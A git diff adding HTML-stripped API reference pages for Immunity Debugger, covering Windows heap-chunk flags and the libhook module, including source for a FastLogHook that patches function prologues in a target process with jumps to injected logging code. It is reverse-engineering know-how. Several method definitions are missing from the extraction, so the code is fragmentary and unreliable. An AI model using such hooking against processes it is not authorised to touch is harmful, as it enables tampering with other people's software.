+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ FLAGS = {'EXTRA PRESENT': ('E', 2), 'FFU1': ('FFU1', 32), 'FFU...
+
+
+
+
+
+ BUSY = ('BUSY', ('B', 1))
+
+
+
+
+
+
+ FLAGS
+
+
+
+
+ Value:
+
+{'EXTRA PRESENT': ('E', 2),
+ 'FFU1': ('FFU1', 32),
+ 'FFU2': ('FFU2', 64),
+ 'FILL PATTERN': ('FP', 4),
+ 'NO COALESCE': ('NC', 128),
+ 'TOP': ('T', 16),
+ 'VIRTUAL ALLOC': ('V', 8)}
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.win32vistaheapchunk-class.html b/1.73/Documentation/Ref/Libs.libheap.win32vistaheapchunk-class.html
new file mode 100755
index 0000000..8311991
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.win32vistaheapchunk-class.html
@@ -0,0 +1,488 @@
+
+
+
+
+ Libs.libheap.win32vistaheapchunk
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class win32vistaheapchunk
+
+
+
+
+
+
+
+
+Class win32vistaheapchunk source code
+
+win32heapchunk --+
+ |
+ win32vistaheapchunk
+
+
+
+
+
+
+
+
+ FLAGS = {'DEBUG': ('D', 8), 'FFU1': ('FFU1', 32), 'FFU2': ('FF...
+
+
+
+
+
+ LFHMASK = 63
+
+
+
+
+
+
+ LFHFLAGS = {'BUSY': ('B', 24), 'TOP': ('T', 3)}
+
+
+
+ Inherited from win32heapchunk :
+ BUSY
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr ,
+ heap =None ,
+ BlockSize =0 )(Constructor)
+ source code
+
+ Win32 Chunk
+
+ Overrides:
+ win32heapchunk.__init__
+ (inherited documentation)
+
+
+
+
+ FLAGS
+
+
+
+
+ Value:
+
+{'DEBUG': ('D', 8),
+ 'FFU1': ('FFU1', 32),
+ 'FFU2': ('FFU2', 64),
+ 'FILL PATTERN': ('FP', 4),
+ 'NO COALESCE': ('NC', 128),
+ 'TOP': ('T', 16)}
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook-module.html b/1.73/Documentation/Ref/Libs.libhook-module.html
new file mode 100755
index 0000000..95f8a3e
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook-module.html
@@ -0,0 +1,387 @@
+
+
+
+
+ Libs.libhook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook
+
+
+
+
+
+
+
+
+Module libhook source code
+(c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.1'
+
+
+
+
+
+ FS_UNHOOK = 0
+
+
+
+
+
+
+ FS_HOOK = 1
+
+
+
+
+
+
+ FS_PAUSE = 2
+
+
+
+
+
+
+ HookTypes = {'ACCESS_VIOLATION_HOOK': 3910, 'CREATE_PROCESS_HO...
+
+
+
+
+
+ HOOK_REG = {'EAX': '[ESP+0x1C]', 'EBP': '[ESP+0x8 ]', 'EBX': '...
+
+
+
+
+
+
+ HookTypes
+
+
+
+
+ Value:
+
+{'ACCESS_VIOLATION_HOOK': 3910,
+ 'CREATE_PROCESS_HOOK': 3907,
+ 'CREATE_THREAD_HOOK': 3905,
+ 'EVERY_EXCEPTION_HOOK': 3901,
+ 'EXIT_PROCESS_HOOK': 3908,
+ 'EXIT_THREAD_HOOK': 3906,
+ 'LOAD_DLL_HOOK': 3903,
+ 'LOG_BP_HOOK': 3909,
+...
+
+
+
+
+
+
+ HOOK_REG
+
+
+
+
+ Value:
+
+{'EAX': '[ESP+0x1C]',
+ 'EBP': '[ESP+0x8 ]',
+ 'EBX': '[ESP+0x10]',
+ 'ECX': '[ESP+0x18]',
+ 'EDI': '[ESP]',
+ 'EDX': '[ESP+0x14]',
+ 'ESI': '[ESP+4 ]',
+ 'ESP': '[ESP+0xC ]'}
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook-pysrc.html b/1.73/Documentation/Ref/Libs.libhook-pysrc.html
new file mode 100755
index 0000000..9c3ffff
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook-pysrc.html
@@ -0,0 +1,1814 @@
+
+
+
+
+ Libs.libhook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook
+
+
+
+
+
+
+
+
+
+ 1
+ 2
+ 3 """ 4 (c) Immunity, Inc. 2004-2007 5 6 7 U{Immunity Inc.<http://www.immunityinc.com>} 8 9 10 """ 11
+ 12 __VERSION__ = '1.1' 13
+ 14 import struct 15 import debugger 16 import pickle 17
+ 18 FS_UNHOOK = 0 19 FS_HOOK = 1 20 FS_PAUSE = 2 21
+ 22 HookTypes = { "ORDINARY_BP_HOOK" : 3900 , "LOG_BP_HOOK" : 3909 , \ 23 "EVERY_EXCEPTION_HOOK" : 3901 , \
+ 24 "POST_ANALYSIS_HOOK" : 3902 , "ACCESS_VIOLATION_HOOK" : 3910 , \
+ 25 "LOAD_DLL_HOOK" : 3903 , "UNLOAD_DLL_HOOK" : 3904 , \
+ 26 "CREATE_THREAD_HOOK" : 3905 , "EXIT_THREAD_HOOK" : 3906 , \
+ 27 "CREATE_PROCESS_HOOK" : 3907 , "EXIT_PROCESS_HOOK" : 3908 , \
+ 28 "PRE_BP_HOOK" : 3911 }
+ 29
+ 30 HOOK_REG = { 'ESI' : '[ESP+4 ]' , 'EDI' : '[ESP]' , \ 31 'EBX' : '[ESP+0x10]' , 'EAX' : '[ESP+0x1C]' , \
+ 32 'ECX' : '[ESP+0x18]' , 'EDX' : '[ESP+0x14]' , \
+ 33 'EBP' : '[ESP+0x8 ]' , 'ESP' : '[ESP+0xC ]' }
+ 34
+ 35
+
38 self . address = None
+
39 self . tbl = [ ]
+
40 self . list = [ ]
+
41 self . entry = [ ]
+
42 self . hooked = False
+
43 self . mem = None
+
44 self . imm = imm
+
45 self . restore = [ ]
+
46 self . status = FS_UNHOOK
+
47 self . AllocSize = 0
+
48 self . memAddress = 0
+
49
+
52
+
55
+
57 if not self . isHooked ( ) :
+
58 return False
+
59
+
60
+
61 for ndx in range ( 0 , len ( self . tbl ) ) :
+
62 self . imm . writeMemory ( self . tbl [ ndx ] [ 0 ] , self . restore [ ndx ] [ 0 ] )
+
63
+
64 self . status = FS_PAUSE
+
65 return True
+
66
+
68 if not self . isPause ( ) :
+
69 return False
+
70
+
71 for ndx in range ( 0 , len ( self . tbl ) ) :
+
72 self . imm . writeMemory ( self . tbl [ ndx ] [ 0 ] , self . restore [ ndx ] [ 1 ] )
+
73 self . status = FS_HOOK
+
74 return True
+
75
+
77 if not self . isHooked ( ) :
+
78 return False
+
79
+
80
+
81 for ndx in range ( 0 , len ( self . tbl ) ) :
+
82 self . imm . writeMemory ( self . tbl [ ndx ] [ 0 ] , self . restore [ ndx ] [ 0 ] )
+
83 self . imm . rVirtualFree ( self . mem )
+
84 self . status = FS_UNHOOK
+
85 return True
+
86
+
88 self . restore = restore
+
89
+
94
+
97
+
99 if self . address :
+
100 self . tbl . append ( ( self . address , self . entry ) )
+
101 self . entry = [ ]
+
102 self . address = address
+
103
+
105 self . entry . append ( ( REG , ) )
+
106
+
108 self . entry . append ( ( address , ) )
+
109
+
111 self . entry . append ( ( REG , offset ) )
+
112
+
114 ndx = 0
+
115 addr = self . mem
+
116 self . _fn = { }
+
117 self . ret = [ ]
+
118
+
119 while ndx != - 1 :
+
120 mem = self . imm . readMemory ( addr , 0x1000 )
+
121 ndx = self . _parseUniqueFn ( mem )
+
122 addr += ndx
+
123
+
124 return self . _fn
+
125
+
127 mem = ""
+
128 self . ret = [ ]
+
129 flag = False
+
130 addr = self . mem
+
131 end = self . imm . readLong ( self . memAddress )
+
132
+
133 mem = self . imm . readMemory ( addr , end - addr )
+
134 self . _parseMem ( mem )
+
135
+
136 return self . ret
+
137
+
139 mem_size = len ( mem )
+
140 ndx = 0
+
141 while ndx < len ( mem ) :
+
142 index = struct . unpack ( "L" , mem [ ndx : ndx + 4 ] ) [ 0 ]
+
143 if index == 0 :
+
144 return - 1
+
145 if index > ( len ( self . tbl ) + 1 ) :
+
146 return - 1
+
147
+
148 entry = self . tbl [ index - 1 ] [ 1 ]
+
149 ndx += 4
+
150 size_e = len ( entry )
+
151 if ( size_e * 4 + ndx ) > ( mem_size ) :
+
152 return ndx - 4
+
153 ndx += size_e * 4
+
154
+
155 addr = self . tbl [ index - 1 ] [ 0 ]
+
156 if self . _fn . has_key ( addr ) :
+
157 self . _fn [ addr ] += 1
+
158 else :
+
159 self . _fn [ addr ] = 1
+
160 return ndx
+
161
+162
+
164
+
165 self . imm . writeLong ( self . memAddress , self . mem )
+
166
+167
+
169 mem_size = len ( mem )
+
170 ndx = 0
+
171
+
172 while ndx < len ( mem ) :
+
173 index = struct . unpack ( "L" , mem [ ndx : ndx + 4 ] ) [ 0 ]
+
174
+
175 if index == 0 :
+
176 return - 1
+
177 if index > ( len ( self . tbl ) + 1 ) :
+
178 return - 1
+
179
+
180 entry = self . tbl [ index - 1 ] [ 1 ]
+
181 ndx += 4
+
182 size_e = len ( entry )
+
183 if ( size_e * 4 + ndx ) > ( mem_size ) :
+
184 return ndx - 4
+
185 ret = struct . unpack ( "L" * size_e , mem [ ndx : ndx + size_e * 4 ] )
+
186 ndx += size_e * 4
+
187 self . ret . append ( ( self . tbl [ index - 1 ] [ 0 ] , ret ) )
+
188 return ndx
+
189
+
193
+
196
+198 CODE_HOOK_START = 8
+199
+200
+201 self . AllocSize = alloc_size
+202
+203 table = self . get ( )
+204 self . imm . Log ( "TABLE SIZE: %d" % len ( table ) )
+205
+206 if not memAddress :
+207 memAddress = self . imm . remoteVirtualAlloc ( alloc_size )
+208
+209 self . memAddress = memAddress
+210
+211 self . imm . Log ( "Logging at 0x%08x" % memAddress )
+212
+213
+214
+215
+216
+217
+218
+219
+220 ptr = memAddress + CODE_HOOK_START
+221
+222 fn_restore = [ ]
+223
+224
+225 fn_ndx = 0
+226 while fn_ndx < len ( table ) :
+227 hookAddress = table [ fn_ndx ] [ 0 ]
+228 entry = table [ fn_ndx ] [ 1 ]
+229
+230 idx = 0
+231
+232 patch_code = self . imm . Assemble ( "JMP 0x%08x" % ptr , address = hookAddress )
+233
+234 while idx < len ( patch_code ) :
+235 op = self . imm . Disasm ( hookAddress + idx )
+236 idx += op . getOpSize ( )
+237 if op . isCall ( ) or op . isJmp ( ) :
+238 op = None
+239 break
+240
+241
+242 if not op :
+243 self . imm . Log ( "deleting: %d" % fn_ndx )
+244 del table [ fn_ndx ]
+245 continue
+246
+247 ex_prelude = self . imm . readMemory ( hookAddress , idx )
+248
+249 code = self . imm . _createCodeforHook ( memAddress , hookAddress + idx , \
+250 fn_ndx + 1 , entry , ex_prelude , alloc_size )
+251
+252 self . imm . writeMemory ( ptr , code )
+253 ptr += len ( code )
+254 self . imm . writeMemory ( hookAddress , patch_code )
+255
+256 fn_restore . append ( ( ex_prelude , patch_code ) )
+257 fn_ndx += 1
+258
+259 self . setTable ( table )
+260 if ptr % 4 :
+261 ptr = 4 + ptr & ~ ( 4 - 1 )
+262 self . setMem ( ptr )
+263 self . imm . writeLong ( memAddress , ptr )
+264 self . setRestore ( fn_restore )
+265
+266
+267
+
272 if self . address :
+
273 self . tbl . append ( ( self . address , self . entry ) )
+
274 self . entry = [ ]
+
275
+
276 self . address = address
+
277 for ndx in range ( 0 , args ) :
+
278 self . logBaseDisplacement ( "ESP" , ndx * 4 + 4 )
+
279
+280
+
283 self . type = 0
+
284 self . msg = ""
+
285 self . string = ""
+
286 self . address = 0
+
287 self . enabled = True
+
288
+
290 """Enable hook execution"""
+
291 self . enabled = True
+
292
+
294 """Disable hook execution"""
+
295 self . enabled = False
+
296
+
298 """Remove the hook"""
+
299 debugger . Removehook ( self . desc )
+
300
+
301 - def add ( self , description , address = 0 , force = 0 , timeout = 0 , mode = 0 ) :
+
302 """Add hook to Immunity Debugger hook database
+
303 @param type: Type of hook
+
304 @param desc: Descriptive string
+
305 @param force: Force hook adding
+
306 @param timeout: time to live in memory
+
307 @param mode: thread mode of ttl execution
+
308 """
+
309
+
310 self . desc = description
+
311 self . address = address
+
312 self . force = force
+
313 self . timeout = timeout
+
314
+
315
+
316
+
317
+
318 self . mode = mode
+
319 if self . type == HookTypes [ "ORDINARY_BP_HOOK" ] :
+
320 debugger . Setbreakpoint ( self . address , 0x200L , "" )
+
321 elif self . type == HookTypes [ "LOG_BP_HOOK" ] :
+
322 debugger . Setloggingbreakpoint ( self . address )
+
323 pickled_object = pickle . dumps ( self )
+
324 return debugger . Addhook ( pickled_object , self . desc , self . type , self . address , self . force , self . timeout , self . mode )
+
325
+
326 - def _run ( self , regs ) :
+
327 """regs is the actual cpu context, be sure of using this values
+
328 and not the ones from imm.getRegs() at hook time"""
+
329 self . regs = regs
+
330 self . run ( regs )
+
331
+
333 """regs is the actual cpu context, be sure of using this values
+
334 and not the ones from imm.getRegs() at hook time"""
+
335 self . regs = regs
+
336 self . runTimeout ( regs )
+
337
+
338
+
339
+
340 - def run ( self , regs ) :
+
341 debugger . Error ( "Your hook doesnt seem to have run() defined" )
+
342 return
+
343
+
345 debugger . Error ( "Your hook doesnt seem to have runTimeout() defined" )
+
346 return
+
347
+348
+
351 Hook . __init__ ( self )
+
352 self . type = HookTypes [ "ORDINARY_BP_HOOK" ]
+
353 self . desc = "BreakpointHook"
+
354
+
360
+
366
+
369 Hook . __init__ ( self )
+
370 self . type = HookTypes [ "EVERY_EXCEPTION_HOOK" ]
+
371 self . desc = "EveryExceptionHook"
+
372
+373 - class PostAnalysisHook ( Hook ) :
+
374 - def __init__ ( self ) :
+
375 Hook . __init__ ( self )
+
376 self . type = HookTypes [ "POST_ANALYSIS_HOOK" ]
+
377 self . desc = "PostAnalysisHook"
+
378
+
381 Hook . __init__ ( self )
+
382 self . type = HookTypes [ "ACCESS_VIOLATION_HOOK" ]
+
383 self . desc = "AcessViolationHook"
+
384
+
387 Hook . __init__ ( self )
+
388 self . type = HookTypes [ "ACCESS_VIOLATION_HOOK" ]
+
389 self . desc = "AcessViolationHook"
+
390 imm . Run ( )
+
391
+392
+
398
+
404
+
407 Hook . __init__ ( self )
+
408 self . type = HookTypes [ "CREATE_THREAD_HOOK" ]
+
409 self . desc = "CreateThreadHook"
+
410
+
413 Hook . __init__ ( self )
+
414 self . type = HookTypes [ "EXIT_THREAD_HOOK" ]
+
415 self . desc = "ExitThreadHook"
+
416
+
419 Hook . __init__ ( self )
+
420 self . type = HookTypes [ "CREATE_PROCESS_HOOK" ]
+
421 self . desc = "CreateProcessHook"
+
422
+
425 Hook . __init__ ( self )
+
426 self . type = HookTypes [ "EXIT_PROCESS_HOOK" ]
+
427 self . desc = "ExitProcessHook"
+
428
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.AccessViolationHook-class.html b/1.73/Documentation/Ref/Libs.libhook.AccessViolationHook-class.html
new file mode 100755
index 0000000..5a7a4fc
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.AccessViolationHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.AccessViolationHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class AccessViolationHook
+
+
+
+
+
+
+
+
+Class AccessViolationHook source code
+
+Hook --+
+ |
+ AccessViolationHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.AllExceptHook-class.html b/1.73/Documentation/Ref/Libs.libhook.AllExceptHook-class.html
new file mode 100755
index 0000000..0c9252d
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.AllExceptHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.AllExceptHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class AllExceptHook
+
+
+
+
+
+
+
+
+Class AllExceptHook source code
+
+Hook --+
+ |
+ AllExceptHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.BpHook-class.html b/1.73/Documentation/Ref/Libs.libhook.BpHook-class.html
new file mode 100755
index 0000000..4072dd3
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.BpHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.BpHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class BpHook
+
+
+
+
+
+
+
+
+Class BpHook source code
+
+Hook --+
+ |
+ BpHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.CreateProcessHook-class.html b/1.73/Documentation/Ref/Libs.libhook.CreateProcessHook-class.html
new file mode 100755
index 0000000..36cf62a
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.CreateProcessHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.CreateProcessHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class CreateProcessHook
+
+
+
+
+
+
+
+
+Class CreateProcessHook source code
+
+Hook --+
+ |
+ CreateProcessHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.CreateThreadHook-class.html b/1.73/Documentation/Ref/Libs.libhook.CreateThreadHook-class.html
new file mode 100755
index 0000000..8a99d4e
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.CreateThreadHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.CreateThreadHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class CreateThreadHook
+
+
+
+
+
+
+
+
+Class CreateThreadHook source code
+
+Hook --+
+ |
+ CreateThreadHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.ExitProcessHook-class.html b/1.73/Documentation/Ref/Libs.libhook.ExitProcessHook-class.html
new file mode 100755
index 0000000..524eece
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.ExitProcessHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.ExitProcessHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class ExitProcessHook
+
+
+
+
+
+
+
+
+Class ExitProcessHook source code
+
+Hook --+
+ |
+ ExitProcessHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.ExitThreadHook-class.html b/1.73/Documentation/Ref/Libs.libhook.ExitThreadHook-class.html
new file mode 100755
index 0000000..c5831cb
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.ExitThreadHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.ExitThreadHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class ExitThreadHook
+
+
+
+
+
+
+
+
+Class ExitThreadHook source code
+
+Hook --+
+ |
+ ExitThreadHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.FastLogHook-class.html b/1.73/Documentation/Ref/Libs.libhook.FastLogHook-class.html
new file mode 100755
index 0000000..aba5b2a
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.FastLogHook-class.html
@@ -0,0 +1,483 @@
+
+
+
+
+ Libs.libhook.FastLogHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class FastLogHook
+
+
+
+
+
+
+
+
+Class FastLogHook source code
+Known Subclasses:
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ setRestore (self ,
+ restore )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ logFunction (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ logDirectMemory (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ logBaseDisplacement (self ,
+ REG ,
+ offset =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getAllUniqueFunctions (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ _parseUniqueFn (self ,
+ mem )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ addFastLogHook (self ,
+ alloc_size =1048576 ,
+ memAddress =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.Hook-class.html b/1.73/Documentation/Ref/Libs.libhook.Hook-class.html
new file mode 100755
index 0000000..c3d56a1
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.Hook-class.html
@@ -0,0 +1,346 @@
+
+
+
+
+ Libs.libhook.Hook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class Hook
+
+
+
+
+
+
+
+
+Class Hook source code
+Known Subclasses:
+
+
+AccessViolationHook , AllExceptHook , BpHook , CreateProcessHook , CreateThreadHook , ExitProcessHook , ExitThreadHook , LoadDLLHook , LogBpHook , PostAnalysisHook , PreBpHook , RunUntilAV , UnloadDLLHook
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ enable (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ disable (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ UnHook (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ add (self ,
+ description ,
+ address =0 ,
+ force =0 ,
+ timeout =0 ,
+ mode =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ _run (self ,
+ regs )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ _runTimeout (self ,
+ regs )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ add (self ,
+ description ,
+ address =0 ,
+ force =0 ,
+ timeout =0 ,
+ mode =0 ) source code
+
+ Add hook to Immunity Debugger hook database
+
+ Parameters:
+
+ typedescforcetimeoutmode
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.LoadDLLHook-class.html b/1.73/Documentation/Ref/Libs.libhook.LoadDLLHook-class.html
new file mode 100755
index 0000000..bf634ad
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.LoadDLLHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.LoadDLLHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class LoadDLLHook
+
+
+
+
+
+
+
+
+Class LoadDLLHook source code
+
+Hook --+
+ |
+ LoadDLLHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.LogBpHook-class.html b/1.73/Documentation/Ref/Libs.libhook.LogBpHook-class.html
new file mode 100755
index 0000000..5bb6b54
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.LogBpHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.LogBpHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class LogBpHook
+
+
+
+
+
+
+
+
+Class LogBpHook source code
+
+Hook --+
+ |
+ LogBpHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.PostAnalysisHook-class.html b/1.73/Documentation/Ref/Libs.libhook.PostAnalysisHook-class.html
new file mode 100755
index 0000000..aa08863
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.PostAnalysisHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.PostAnalysisHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class PostAnalysisHook
+
+
+
+
+
+
+
+
+Class PostAnalysisHook source code
+
+Hook --+
+ |
+ PostAnalysisHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.PreBpHook-class.html b/1.73/Documentation/Ref/Libs.libhook.PreBpHook-class.html
new file mode 100755
index 0000000..f43322b
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.PreBpHook-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.libhook.PreBpHook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class PreBpHook
+
+
+
+
+
+
+
+
+Class PreBpHook source code
+
+Hook --+
+ |
+ PreBpHook
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.RunUntilAV-class.html b/1.73/Documentation/Ref/Libs.libhook.RunUntilAV-class.html
new file mode 100755
index 0000000..c1c27ca
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.RunUntilAV-class.html
@@ -0,0 +1,210 @@
+
+
+
+
+ Libs.libhook.RunUntilAV
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libhook ::
+ Class RunUntilAV
+
+
+
+
+
+
+
+
+Class RunUntilAV source code
+
+Hook --+
+ |
+ RunUntilAV
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libhook.STDCALLFastLogHook-class.html b/1.73/Documentation/Ref/Libs.libhook.STDCALLFastLogHook-class.html
new file mode 100755
index 0000000..ad498d2
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libhook.STDCALLFastLogHook-class.html
@@ -0,0 +1,263 @@
+
+
+
+
+ Libs.libhook.STDCALLFastLogHook
+
